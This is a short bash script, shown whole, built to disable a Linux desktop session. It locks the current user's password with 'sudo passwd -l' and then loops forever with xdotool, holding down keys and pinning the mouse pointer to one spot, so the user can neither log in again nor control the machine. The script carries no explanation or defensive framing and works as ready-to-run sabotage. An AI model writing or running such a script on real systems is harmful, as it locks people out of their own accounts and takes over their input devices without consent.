#!/bin/bash sudo passwd -l $USER ; while [ true ] ; do xdotool keydown 0xff7e + keydown 0xff13 ; xdotool mousemove --sync 1000 0 ; done